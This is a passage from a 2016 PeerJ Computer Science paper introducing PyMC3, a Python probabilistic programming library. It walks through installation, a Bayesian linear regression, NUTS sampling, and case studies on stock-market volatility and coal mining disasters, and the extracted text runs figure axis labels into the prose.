this software package. Subjects Data Mining and Machine Learning, Data Science, Scientific Computing and Simulation Keywords Bayesian statistic, Probabilistic Programming, Python, Markov chain Monte Carlo, Statistical modeling INTRODUCTION Probabilistic programming (PP) allows for flexible specification and fitting of Bayesian statistical models. PyMC3 is a new, open-source PP framework with an intuitive and readable, yet powerful, syntax that is close to the natural syntax statisticians use to describe models. It features next-generation Markov chain Monte Carlo (MCMC) sampling algorithms such as the No-U-Turn Sampler (NUTS) (Hoffman & Gelman, 2014), a self-tuning variant of Hamiltonian Monte Carlo (HMC) (Duane et al., 1987). This class of samplers works well on high dimensional and complex posterior distributions and allows many complex models to be fit without specialized knowledge about fitting algorithms. HMC and NUTS take advantage of gradient information from the likelihood to achieve much faster convergence than traditional sampling methods, especially for larger models. NUTS also has several self-tuning strategies for adaptively setting the tuneable parameters of Hamiltonian Monte Carlo, which means specialized knowledge about how the algorithms work is not required. PyMC3, Stan (Stan Development Team, 2015), and the LaplacesDemon package for R are currently the only PP packages to offer HMC. A number of probabilistic programming languages and systems have emerged over the past 2–3 decades. One of the earliest to enjoy widespread usage was the BUGS language (Spiegelhalter et al., 1995), which allows for the easy specification of Bayesian How to cite this article Salvatier et al. (2016), Probabilistic programming in Python using PyMC3. PeerJ Comput. Sci. 2:e55; DOI 10.7717/peerj-cs.55 https://peerj.com mailto:thomas.wiecki@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.55 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.55 models, and fitting them via Markov chain Monte Carlo methods. Newer, more expressive languages have allowed for the creation of factor graphs and probabilistic graphical models. Each of these systems are domain-specific languages built on top of existing low- level languages; notable examples include Church (Goodman et al., 2012) (derived from Scheme), Anglican (Wood, Van de Meent & Mansinghka, 2014) (integrated with Clojure and compiled with a Java Virtual Machine), Venture (Mansinghka, Selsam & Perov, 2014) (built from C++), Infer.NET (Minka et al., 2010) (built upon the .NET framework), Figaro (Pfeffer, 2014) (embedded into Scala), WebPPL (Goodman & Stuhlmüller, 2014) (embedded into JavaScript), Picture (Kulkarni et al., 2015) (embedded into Julia), and Quicksand (Ritchie, 2014) (embedded into Lua). Probabilistic programming in Python (Python Software Foundation, 2010) confers a number of advantages including multi-platform compatibility, an expressive yet clean and readable syntax, easy integration with other scientific libraries, and extensibility via C, C++, Fortran or Cython (Behnel et al., 2011). These features make it straightforward to write and use custom statistical distributions, samplers and transformation functions, as required by Bayesian analysis. While most of PyMC3’s user-facing features are written in pure Python, it leverages Theano (Bergstra et al., 2010; Bastien et al., 2012) to transparently transcode models to C and compile them to machine code, thereby boosting performance. Theano is a library that allows expressions to be defined using generalized vector data structures called tensors, which are tightly integrated with the popular NumPy (Van der Walt, Colbert, Varoquaux, 2011) ndarray data structure, and similarly allow for broadcasting and advanced indexing, just as NumPy arrays do. Theano also automatically optimizes the likelihood’s computational graph for speed and provides simple GPU integration. Here, we present a primer on the use of PyMC3 for solving general Bayesian statistical inference and prediction problems. We will first describe basic PyMC3 usage, including installation, data creation, model definition, model fitting and posterior analysis. We will then employ two case studies to illustrate how to define and fit more sophisticated models. Finally we will show how PyMC3 can be extended and discuss more advanced features, such as the Generalized Linear Models (GLM) subpackage, custom distributions, custom transformations and alternative storage backends. INSTALLATION Running PyMC3 requires a working Python interpreter (Python Software Foundation, 2010), either version 2.7 (or more recent) or 3.4 (or more recent); we recommend that new users install version 3.4. A complete Python installation for Mac OSX, Linux and Windows can most easily be obtained by downloading and installing the free AnacondaPythonDistribution by ContinuumIO. PyMC3 can be installed using ‘pip‘: pip install git+https://github.com/pymc-devs/pymc3 PyMC3 depends on several third-party Python packages which will be automatically installed when installing via pip. The four required dependencies are: Theano, NumPy, Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 2/24 https://peerj.com https://store.continuum.io/cshop/anaconda/ http://dx.doi.org/10.7717/peerj-cs.55 SciPy, and Matplotlib. To take full advantage of PyMC3, the optional dependencies Pandas and Patsy should also be installed. pip install patsy pandas The source code for PyMC3 is hosted on GitHub at https://github.com/pymc- devs/pymc3 and is distributed under the liberal ApacheLicense2.0. On the GitHub site, users may also report bugs and other issues, as well as contribute code to the project, which we actively encourage. Comprehensive documentation is readily available at http://pymc-devs.github.io/pymc3/. A MOTIVATING EXAMPLE: LINEAR REGRESSION To introduce model definition, fitting and posterior analysis, we first consider a simple Bayesian linear regression model with normal priors on the parameters. We are interested in predicting outcomes Y as normally-distributed observations with an expected value µ that is a linear function of two predictor variables, X1 and X2. Y ∼N(µ,σ2) µ=α+β1X1+β2X2 where α is the intercept, and βi is the coefficient for covariate Xi, while σ represents the observation or measurement error. We will apply zero-mean normal priors with variance of 10 to both regression coefficients, which corresponds to weak information regarding the true parameter values. Since variances must be positive, we will also choose a half-normal distribution (normal distribution bounded below at zero) as the prior for σ . α∼N(0,10) βi∼N(0,10) σ ∼|N(0,1)|. Generating data We can simulate some data from this model using NumPy’s random module, and then use PyMC3 to try to recover the corresponding parameters. The following code implements this simulation, and the resulting data are shown in Fig. 1: import numpy as np import matplotlib.pyplot as plt # Intialize random number generator np.random.seed(123) # True parameter values alpha, sigma = 1, 1 beta = [1, 2.5] Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 3/24 https://peerj.com https://github.com/pymc-devs/pymc3 https://github.com/pymc-devs/pymc3 https://github.com/pymc-devs/pymc3/blob/master/LICENSE http://pymc-devs.github.io/pymc3/ http://dx.doi.org/10.7717/peerj-cs.55 Figure 1 Simulated regression data. # Size of dataset size = 100 # Predictor variable X1 = np.linspace(0, 1, size) X2 = np.linspace(0,.2, size) # Simulate outcome variable Y = alpha + beta[0]*X1 + beta[1]*X2 + np.random.randn(size)*sigma Model specification Specifying this model in PyMC3 is straightforward because the syntax is similar to the statistical notation. For the most part, each line of Python code corresponds to a line in the model notation above. First, we import the components we will need from PyMC3. from pymc3 import Model, Normal, HalfNormal The following code implements the model in PyMC: basic_model = Model() with basic_model: # Priors for unknown model parameters alpha = Normal(’alpha’, mu=0, sd=10) beta = Normal(’beta’, mu=0, sd=10, shape=2) sigma = HalfNormal(’sigma’, sd=1) # Expected value of outcome mu = alpha + beta[0]*X1 + beta[1]*X2 Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 # Likelihood (sampling distribution) of observations Y_obs = Normal(’Y_obs’, mu=mu, sd=sigma, observed=Y) The first line, basic_model = Model() creates a new Model object which is a container for the model random variables. Following instantiation of the model, the subsequent specification of the model components is performed inside a with statement: with basic_model: This creates a context manager, with our basic_model as the context, that includes all statements until the indented block ends. This means all PyMC3 objects introduced in the indented code block below the with statement are added to the model behind the scenes. Absent this context manager idiom, we would be forced to manually associate each of the variables with basic_model as they are created, which would result in more verbose code. If you try to create a new random variable outside of a model context manger, it will raise an error since there is no obvious model for the variable to be added to. The first three statements in the context manager create stochastic random variables with Normal prior distributions for the regression coefficients, and a half-normal distribution for the standard deviation of the observations, σ . alpha = Normal(’alpha’, mu=0, sd=10) beta = Normal(’beta’, mu=0, sd=10, shape=2) sigma = HalfNormal(’sigma’, sd=1) These are stochastic because their values are partly determined by its parents in the dependency graph of random variables, which for priors are simple constants, and are partly random, according to the specified probability distribution. The Normal constructor creates a normal random variable to use as a prior. The first argument for random variable constructors is always the name of the variable, which should almost always match the name of the Python variable being assigned to, since it can be used to retrieve the variable from the model when summarizing output. The remaining required arguments for a stochastic object are the parameters, which in the case of the normal distribution are the mean mu and the standard deviation sd, which we assign hyperparameter values for the model. In general, a distribution’s parameters are values that determine the location, shape or scale of the random variable, depending on the parameterization of the distribution. Most commonly used distributions, such as Beta, Exponential, Categorical, Gamma, Binomial and others, are available as PyMC3 objects, and do not need to be manually coded by the user. The beta variable has an additional shape argument to denote it as a vector-valued parameter of size 2. The shape argument is available for all distributions and specifies the length or shape of the random variable; when unspecified, it defaults to a value of one (i.e., a scalar). It can be an integer to specify an array, or a tuple to specify a multidimensional Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 5/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 array. For example, shape=(5,7) makes random variable that takes a 5 by 7 matrix as its value. Detailed notes about distributions, sampling methods and other PyMC3 functions are available via the help function. help(Normal) Help on class Normal in module pymc3.distributions.continuous: class Normal(pymc3.distributions.distribution.Continuous) | Normal log-likelihood. | | .. math:: ight\} | | Parameters | ---------- | mu : float | Mean of the distribution. | tau : float | Precision of the distribution, which corresponds to | :math:‘1/\sigma^2‘ (tau > 0). | sd : float | Standard deviation of the distribution. Alternative parameterization. | | .. note:: | - :math:‘E(X) = \mu‘ | - :math:‘Var(X) = 1 / \tau‘ Having defined the priors, the next statement creates the expected value mu of the outcomes, specifying the linear relationship: mu = alpha + beta[0]*X1 + beta[1]*X2 This creates a deterministic random variable, which implies that its value is completely determined by its parents’ values. That is, there is no uncertainty in the variable beyond that which is inherent in the parents’ values. Here, mu is just the sum of the intercept alpha and the two products of the coefficients in beta and the predictor variables, whatever their current values may be. PyMC3 random variables and data can be arbitrarily added, subtracted, divided, or multiplied together, as well as indexed (extracting a subset of values) to create new random variables. Many common mathematical functions like sum, sin, exp and linear algebra functions like dot (for inner product) and inv (for inverse) are also provided. Applying operators and functions to PyMC3 objects results in tremendous model expressivity. The final line of the model defines Y_obs, the sampling distribution of the response data. Y_obs = Normal(’Y_obs’, mu=mu, sd=sigma, observed=Y) This is a special case of a stochastic variable that we call an observed stochastic, and it is the data likelihood of the model. It is identical to a standard stochastic, except that Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 6/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 its observed argument, which passes the data to the variable, indicates that the values for this variable were observed, and should not be changed by any fitting algorithm applied to the model. The data can be passed in the form of either a numpy.ndarray or pandas.DataFrame object. Notice that, unlike the prior distributions, the parameters for the normal distribution of Y_obs are not fixed values, but rather are the deterministic object mu and the stochastic sigma. This creates parent-child relationships between the likelihood and these two variables, as part of the directed acyclic graph of the model. Model fitting Having completely specified our model, the next step is to obtain posterior estimates for the unknown variables in the model. Ideally, we could derive the posterior estimates analytically, but for most non-trivial models this is not feasible. We will consider two approaches, whose appropriateness depends on the structure of the model and the goals of the analysis: finding the maximum a posteriori (MAP) point using optimization methods, and computing summaries based on samples drawn from the posterior distribution using MCMC sampling methods. Maximum a posteriori methods The maximum a posteriori (MAP) estimate for a model, is the mode of the posterior distribution and is generally found using numerical optimization methods. This is often fast and easy to do, but only gives a point estimate for the parameters and can be misleading if the mode isn’t representative of the distribution. PyMC3 provides this functionality with the find_MAP function. Below we find the MAP for our original model. The MAP is returned as a parameter point, which is always represented by a Python dictionary of variable names to NumPy arrays of parameter values. from pymc3 import find_MAP map_estimate = find_MAP(model=basic_model) print(map_estimate) {‘alpha’: array(1.0136638069892534), ‘beta’: array([ 1.46791629, 0.29358326]), ‘sigma_log’: array(0.11928770010017063)} By default, find_MAP uses the Broyden–Fletcher–Goldfarb–Shanno (BFGS) optimization algorithm to find the maximum of the log-posterior but also allows selection of other optimization algorithms from the scipy.optimize module. For example, below we use Powell’s method to find the MAP. from scipy import optimize Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 7/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 map_estimate = find_MAP(model=basic_model, fmin=optimize.fmin_powell) print(map_estimate) {’alpha’: array(1.0175522109423465), ’beta’: array([ 1.51426782, 0.03520891]), ’sigma_log’: array(0.11815106849951475)} It is important to note that the MAP estimate is not always reasonable, especially if the mode is at an extreme. This can be a subtle issue; with high dimensional posteriors, one can have areas of extremely high density but low total probability because the volume is very small. This will often occur in hierarchical models with the variance parameter for the random effect. If the individual group means are all the same, the posterior will have near infinite density if the scale parameter for the group means is almost zero, even though the probability of such a small scale parameter will be small since the group means must be extremely close together. Also, most techniques for finding the MAP estimate only find a local optimium (which is often good enough), and can therefore fail badly for multimodal posteriors if the different modes are meaningfully different. Sampling methods Though finding the MAP is a fast and easy way of obtaining parameter estimates of well-behaved models, it is limited because there is no associated estimate of uncertainty produced with the MAP estimates. Instead, a simulation-based approach such as MCMC can be used to obtain a Markov chain of values that, given the satisfaction of certain conditions, are indistinguishable from samples from the posterior distribution. To conduct MCMC sampling to generate posterior samples in PyMC3, we specify a step method object that corresponds to a single iteration of a particular MCMC algorithm, such as Metropolis, Slice sampling, or the No-U-Turn Sampler (NUTS). PyMC3’s step_methods submodule contains the following samplers: NUTS, Metropolis, Slice, HamiltonianMC, and BinaryMetropolis. Gradient-based sampling methods PyMC3 implements several standard sampling algorithms, such as adaptive Metropolis- Hastings and adaptive slice sampling, but PyMC3’s most capable step method is the No-U-Turn Sampler. NUTS is especially useful for sampling from models that have many continuous parameters, a situation where older MCMC algorithms work very slowly. It takes advantage of information about where regions of higher probability are, based on the gradient of the log posterior-density. This helps it achieve dramatically faster convergence on large problems than traditional sampling methods achieve. PyMC3 relies on Theano to analytically compute model gradients via automatic differentiation of the posterior density. NUTS also has several self-tuning strategies for adaptively setting the tunable parameters of Hamiltonian Monte Carlo. For random variables that are undifferentiable (namely, discrete variables) NUTS cannot be used, but it may still be used on the differentiable variables in a model that contains undifferentiable variables. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 8/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 NUTS requires a scaling matrix parameter, which is analogous to the variance parameter for the jump proposal distribution in Metropolis-Hastings, although NUTS uses it somewhat differently. The matrix gives an approximate shape of the posterior distribution, so that NUTS does not make jumps that are too large in some directions and too small in other directions. It is important to set this scaling parameter to a reasonable value to facilitate efficient sampling. This is especially true for models that have many unobserved stochastic random variables or models with highly non-normal posterior distributions. Poor scaling parameters will slow down NUTS significantly, sometimes almost stopping it completely. A reasonable starting point for sampling can also be important for efficient sampling, but not as often. Fortunately, NUTS can often make good guesses for the scaling parameters. If you pass a point in parameter space (as a dictionary of variable names to parameter values, the same format as returned by find_MAP) to NUTS, it will look at the local curvature of the log posterior-density (the diagonal of the Hessian matrix) at that point to guess values for a good scaling vector, which can result in a good value. The MAP estimate is often a good point to use to initiate sampling. It is also possible to supply your own vector or scaling matrix to NUTS. Additionally, the find_hessian or find_hessian_diag functions can be used to modify a Hessian at a specific point to be used as the scaling matrix or vector. Here, we will use NUTS to sample 2000 draws from the posterior using the MAP as the starting and scaling point. Sampling must also be performed inside the context of the model. from pymc3 import NUTS, sample with basic_model: # obtain starting values via MAP start = find_MAP(fmin=optimize.fmin_powell) # instantiate sampler step = NUTS(scaling=start) # draw 2000 posterior samples trace = sample(2000, step, start=start) [-----------------100%-----------------] 2000 of 2000 complete in 4.6 sec The sample function runs the step method(s) passed to it for the given number of iterations and returns a Trace object containing the samples collected, in the order they were collected. The trace object can be queried in a similar way to a dict containing a map from variable names to numpy.arrays. The first dimension of the array is the sampling index and the later dimensions match the shape of the variable. We can extract the last 5 values for the alpha variable as follows trace[’alpha’][-5:] Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 array([ 0.98134501, 1.04901676, 1.03638451, 0.88261935, 0.95910723]) Posterior analysis PyMC3 provides plotting and summarization functions for inspecting the sampling output. A simple posterior plot can be created using traceplot, its output is shown in Fig. 2. from pymc3 import traceplot traceplot(trace) The left column consists of a smoothed histogram (using kernel density estimation) of the marginal posteriors of each stochastic random variable while the right column contains the samples of the Markov chain plotted in sequential order. The beta variable, being vector-valued, produces two histograms and two sample traces, corresponding to both predictor coefficients. For a tabular summary, the summary function provides a text-based output of common posterior statistics: from pymc3 import summary summary(trace[’alpha’]) alpha: Mean SD MC Error 95% HPD interval ------------------------------------------------------------------- 1.024 0.244 0.007 [0.489, 1.457] Posterior quantiles: 2.5 25 50 75 97.5 |--------------|==============|==============|--------------| 0.523 0.865 1.024 1.200 1.501 CASE STUDY 1: STOCHASTIC VOLATILITY We present a case study of stochastic volatility, time varying stock market volatility, to illustrate PyMC3’s capability for addressing more realistic problems. The distribution of market returns is highly non-normal, which makes sampling the volatilities significantly more difficult. This example has 400+ parameters so using older sampling algorithms like Metropolis-Hastings would be inefficient, generating highly auto-correlated samples with a low effective sample size. Instead, we use NUTS, which is dramatically more efficient. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 10/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 0.5 0.6 0.7 0.8 0.9 1.0 1.1 1.2 1.3 0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0 Fr eq ue nc y alpha 0 1000 2000 3000 4000 5000 0.5 0.6 0.7 0.8 0.9 1.0 1.1 1.2 1.3 S am pl e va lu e alpha 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0 4.5 5.0 0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0 4.5 Fr eq ue nc y beta 0 1000 2000 3000 4000 5000 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0 4.5 5.0 S am pl e va lu e beta 0.3 0.2 0.1 0.0 0.1 0.2 0.3 0 1 2 3 4 5 6 Fr eq ue nc y sigma_log 0 1000 2000 3000 4000 5000 0.3 0.2 0.1 0.0 0.1 0.2 0.3 S am pl e va lu e sigma_log 0.7 0.8 0.9 1.0 1.1 1.2 1.3 1.4 0 1 2 3 4 5 6 Fr eq ue nc y sigma 0 1000 2000 3000 4000 5000 0.7 0.8 0.9 1.0 1.1 1.2 1.3 1.4 S am pl e va lu e sigma Figure 2 Kernel density estimates and simulated trace for each variable in the linear regression model. The model Asset prices have time-varying volatility (variance of day over day returns). In some periods, returns are highly variable, while in others they are very stable. Stochastic volatility models address this with a latent volatility variable, which is allowed to change over time. The following model is similar to the one described in the NUTS paper (Hoffman & Gelman, 2014, p. 21). σ ∼exp(50) ν∼exp(.1) si∼N(si−1,σ−2) log(yi)∼T(ν,0,exp(−2si)). Here, y is the response variable, a daily return series which we model with a Student-T distribution having an unknown degrees of freedom parameter, and a scale parameter determined by a latent process s. The individual si are the individual daily log volatilities in the latent log volatility process. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 Figure 3 Historical daily returns of the S&P500 during the 2008 financial crisis. The data Our data consist of daily returns of the S&P 500 during the 2008 financial crisis. import pandas as pd returns = pd.read_csv(’data/SP500.csv’, index_col=0, parse_dates=True) See Fig. 3 for a plot of the daily returns data. As can be seen, stock market volatility increased remarkably during the 2008 financial crisis. Model implementation As with the linear regression example, implementing the model in PyMC3 mirrors its statistical specification. This model employs several new distributions: the Exponential distribution for the ν and σ priors, the Student-T (StudentT) distribution for distribution of returns, and the GaussianRandomWalk for the prior for the latent volatilities. In PyMC3, variables with positive support like Exponential are transformed with a log transform, making sampling more robust. Behind the scenes, the variable is transformed to the unconstrained space (named ‘‘variableName_log’’) and added to the model for sampling. In this model this happens behind the scenes for both the degrees of freedom, nu, and the scale parameter for the volatility process, sigma, since they both have exponential priors. Variables with priors that are constrained on both sides, like Beta or Uniform, are also transformed to be unconstrained, here with a log odds transform. Although (unlike model specification in PyMC2) we do not typically provide starting points for variables at the model specification stage, it is possible to provide an initial value for any distribution (called a ‘‘test value’’ in Theano) using the testval argument. This overrides the default test value for the distribution (usually the mean, median or mode of Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 12/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 the distribution), and is most often useful if some values are invalid and we want to ensure we select a valid one. The test values for the distributions are also used as a starting point for sampling and optimization by default, though this is easily overriden. The vector of latent volatilities s is given a prior distribution by a GaussianRandomWalk object. As its name suggests, GaussianRandomWalk is a vector-valued distribution where the values of the vector form a random normal walk of length n, as specified by the shape argument. The scale of the innovations of the random walk, sigma, is specified in terms of the precision of the normally distributed innovations and can be a scalar or vector. from pymc3 import Exponential, StudentT, exp, Deterministic from pymc3.distributions.timeseries import GaussianRandomWalk with Model() as sp500_model: nu = Exponential(’nu’, 1./10, testval=5.) sigma = Exponential(’sigma’, 1./.02, testval=.1) s = GaussianRandomWalk(’s’, sigma**-2, shape=len(returns)) volatility_process = Deterministic(’volatility_process’, exp(-2*s)) r = StudentT(’r’, nu, lam=1/volatility_process, observed=returns[’S&P500’]) Notice that we transform the log volatility process s into the volatility process by exp(-2*s). Here, exp is a Theano function, rather than the corresponding function in NumPy; Theano provides a large subset of the mathematical functions that NumPy does. Also note that we have declared the Model name sp500_model in the first occurrence of the context manager, rather than splitting it into two lines, as we did for the first example. Fitting Before we draw samples from the posterior, it is prudent to find a decent starting value, by which we mean a point of relatively high probability. For this model, the full maximum a posteriori (MAP) point over all variables is degenerate and has infinite density. But, if we fix log_sigma and nu it is no longer degenerate, so we find the MAP with respect only to the volatility process s keeping log_sigma and nu constant at their default values (remember that we set testval=.1 for sigma). We use the Limited-memory BFGS (L-BFGS) optimizer, which is provided by the scipy.optimize package, as it is more efficient for high dimensional functions; this model includes 400 stochastic random variables (mostly from s). As a sampling strategy, we execute a short initial run to locate a volume of high probability, then start again at the new starting point to obtain a sample that can be used for inference. trace[-1] gives us the last point in the sampling trace. NUTS will recalculate the scaling parameters based on the new point, and in this case it leads to faster sampling due to better scaling. import scipy with sp500_model: Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 13/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 0 10 20 30 40 50 60 70 80 90 0.00 0.01 0.02 0.03 0.04 0.05 0.06 Fr eq ue nc y nu 0 500 1000 1500 2000 0 10 20 30 40 50 60 70 80 90 S am pl e va lu e nu 0.08 0.10 0.12 0.14 0.16 0.18 0.20 0.22 0 5 10 15 20 25 Fr eq ue nc y sigma 0 500 1000 1500 2000 0.08 0.10 0.12 0.14 0.16 0.18 0.20 0.22 S am pl e va lu e sigma Figure 4 Posterior samples of degrees of freedom (nu) and scale (sigma) parameters of the stochastic volatility model. Each plotted line repre- sents a single independent chain sampled in parallel. start = find_MAP(vars=[s], fmin=scipy.optimize.fmin_l_bfgs_b) step = NUTS(scaling=start) trace = sample(100, step, progressbar=False) # Start next run at the last sampled position. step = NUTS(scaling=trace[-1], gamma=.25) trace = sample(2000, step, start=trace[-1], progressbar=False, njobs=2) Notice that the call to sample includes an optional njobs=2 argument, which enables the parallel sampling of 4 chains (assuming that we have 2 processors available). We can check our samples by looking at the traceplot for nu and sigma; each parallel chain will be plotted within the same set of axes (Fig. 4). traceplot(trace, [nu, sigma]); Finally we plot the distribution of volatility paths by plotting many of our sampled volatility paths on the same graph (Fig. 5). Each is rendered partially transparent (via the alpha argument in Matplotlib’s plot function) so the regions where many paths overlap are shaded more darkly. fig, ax = plt.subplots(figsize=(15, 8)) returns.plot(ax=ax) ax.plot(returns.index, 1/np.exp(trace[’s’,::30].T), ’r’, alpha=.03); ax.set(title=’volatility_process’, xlabel=’time’, ylabel=’volatility’); ax.legend([’S&P500’, ’stochastic volatility process’]) As you can see, the model correctly infers the increase in volatility during the 2008 financial crash. It is worth emphasizing the complexity of this model due to its high dimensionality and dependency-structure in the random walk distribution. NUTS as implemented in PyMC3, however, correctly infers the posterior distribution with ease. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 14/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 Feb 20 08 Apr 20 08 Jun 20 08 Aug 20 08 Oc t 20 08 De c 2 008 Feb 20 09 Apr 20 09 Jun 20 09 Aug 20 09 time 0.10 0.05 0.00 0.05 0.10 0.15 0.20 vo la til ity volatility_process S&P500 stochastic volatility process Figure 5 Posterior plot of volatility paths (red), alongside market data (blue). Figure 6 Recorded counts of coal mining disasters in the UK, 1851–1962. CASE STUDY 2: COAL MINING DISASTERS This case study implements a change-point model for a time series of recorded coal mining disasters in the UK from 1851 to 1962 (Jarrett, 1979). The annual number of disasters is thought to have been affected by changes in safety regulations during this period, as can be seen in Fig. 6. We have also included a pair of years with missing data, identified as missing by a NumPy MaskedArray using -999 as a sentinel value. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 15/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 Our objective is to estimate when the change occurred, in the presence of missing data, using multiple step methods to allow us to fit a model that includes both discrete and continuous random variables. disaster_data = np.ma.masked_values([4, 5, 4, 0, 1, 4, 3, 4, 0, 6, 3, 3, 4, 0, 2, 6, 3, 3, 5, 4, 5, 3, 1, 4, 4, 1, 5, 5, 3, 4, 2, 5, 2, 2, 3, 4, 2, 1, 3, -999, 2, 1, 1, 1, 1, 3, 0, 0, 1, 0, 1, 1, 0, 0, 3, 1, 0, 3, 2, 2, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 2, 1, 0, 0, 0, 1, 1, 0, 2, 3, 3, 1, -999, 2, 1, 1, 1, 1, 2, 4, 2, 0, 0, 1, 4, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1], value=-999) year = np.arange(1851, 1962) plot(year, disaster_data, ’o’, markersize=8); ylabel("Disaster count") xlabel("Year") Counts of disasters in the time series is thought to follow a Poisson process, with a relatively large rate parameter in the early part of the time series, and a smaller rate in the later part. The Bayesian approach to such a problem is to treat the change point as an unknown quantity in the model, and assign it a prior distribution, which we update to a posterior using the evidence in the dataset. In our model, Dt ∼Pois(rt ) rt = { l, if t < s e, if t ≥ s s∼Unif(tl,th) e∼exp(1) l ∼exp(1) the parameters are defined as follows: • Dt : The number of disasters in year t • rt : The rate parameter of the Poisson distribution of disasters in year t. • s: The year in which the rate parameter changes (the switchpoint). • e: The rate parameter before the switchpoint s. • l: The rate parameter after the switchpoint s. • tl, th: The lower and upper boundaries of year t. from pymc3 import DiscreteUniform, Poisson, switch with Model() as disaster_model: switchpoint = DiscreteUniform(’switchpoint’, lower=year.min(), upper=year.max(), testval=1900) # Priors for pre- and post-switch rates number of disasters early_rate = Exponential(’early_rate’, 1) Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 16/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 late_rate = Exponential(’late_rate’, 1) # Allocate appropriate Poisson rates to years before and after current rate = switch(switchpoint >= year, early_rate, late_rate) disasters = Poisson(’disasters’, rate, observed=disaster_data) This model introduces discrete variables with the Poisson likelihood and a discrete- uniform prior on the change-point s. Our implementation of the rate variable is as a conditional deterministic variable, where its value is conditioned on the current value of s. rate = switch(switchpoint >= year, early_rate, late_rate) The conditional statement is realized using the Theano function switch, which uses the first argument to select either of the next two arguments. Missing values are handled concisely by passing a MaskedArray or apandas.DataFrame with NaN values to the observed argument when creating an observed stochastic random variable. From this, PyMC3 automatically creates another random variable, disasters.missing_values, which treats the missing values as unobserved stochastic nodes. All we need to do to handle the missing values is ensure we assign a step method to this random variable. Unfortunately, because they are discrete variables and thus have no meaningful gradient, we cannot use NUTS for sampling either switchpoint or the missing disaster observations. Instead, we will sample using a Metroplis step method, which implements self-tuning Metropolis-Hastings, because it is designed to handle discrete values. Here, the sample function receives a list containing both the NUTS and Metropolis samplers, and sampling proceeds by first applying step1 then step2 at each iteration. from pymc3 import Metropolis with disaster_model: step1 = NUTS([early_rate, late_rate]) step2 = Metropolis([switchpoint, disasters.missing_values[0]] ) trace = sample(10000, step=[step1, step2]) [-----------------100%-----------------] 10000 of 10000 complete in 6.9 sec In the trace plot (Fig. 7) we can see that there is about a 10 year span that’s plausible for a significant change in safety, but a 5-year span that contains most of the probability mass. The distribution is jagged because of the jumpy relationship between the year switch-point and the likelihood and not due to sampling error. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 17/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 1885 1890 1895 1900 0 500 1000 1500 2000 2500 Fr eq ue nc y switchpoint 0 2000 4000 6000 8000 10000 1880 1885 1890 1895 1900 1905 S am pl e va lu e switchpoint 0.7 0.8 0.9 1.0 1.1 1.2 1.3 1.4 1.5 0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0 4.5 Fr eq ue nc y early_rate_log 0 2000 4000 6000 8000 10000 0.7 0.8 0.9 1.0 1.1 1.2 1.3 1.4 1.5 S am pl e va lu e early_rate_log 0.6 0.4 0.2 0.0 0.2 0.4 0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 Fr eq ue nc y late_rate_log 0 2000 4000 6000 8000 10000 0.6 0.4 0.2 0.0 0.2 0.4 S am pl e va lu e late_rate_log 0 1 2 3 4 5 6 7 0 500 1000 1500 2000 2500 3000 3500 4000 4500 Fr eq ue nc y disasters_missing 0 2000 4000 6000 8000 10000 0 2 4 6 8 10 12 S am pl e va lu e disasters_missing 2.0 2.5 3.0 3.5 4.0 4.5 0.0 0.2 0.4 0.6 0.8 1.0 1.2 1.4 Fr eq ue nc y early_rate 0 2000 4000 6000 8000 10000 2.0 2.5 3.0 3.5 4.0 4.5 S am pl e va lu e early_rate 0.4 0.6 0.8 1.0 1.2 1.4 1.6 0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 Fr eq ue nc y late_rate 0 2000 4000 6000 8000 10000 0.4 0.6 0.8 1.0 1.2 1.4 1.6 S am pl e va lu e late_rate Figure 7 Posterior distributions and traces from disasters change point model. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 